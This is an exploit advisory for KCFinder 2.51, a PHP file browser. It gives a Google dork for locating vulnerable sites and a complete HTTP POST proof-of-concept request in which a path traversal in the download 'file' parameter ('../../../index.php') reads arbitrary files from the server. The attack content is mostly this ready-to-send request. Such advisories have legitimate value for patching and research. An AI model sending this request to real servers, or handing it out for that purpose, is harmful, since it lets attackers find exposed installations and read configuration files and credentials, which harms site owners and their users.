KCFinder 2.51 - Local File Disclosure



---------------------------------------------------

# Exploit Title: KCFinder Local File Disclosure 
# Author: DaOne
# Vendor Homepage: http://kcfinder.sunhater.com/
# Category: webapps/php
# Version: 2.51 + old versions
# Google dork: inurl:kcfinder/browse.php
---------------------------------------------------

[#] Tested on their own demo...

-PoC-
POST http://server/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
Host: server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

dir=images/Photos+from+Bulgaria&file=../../../index.php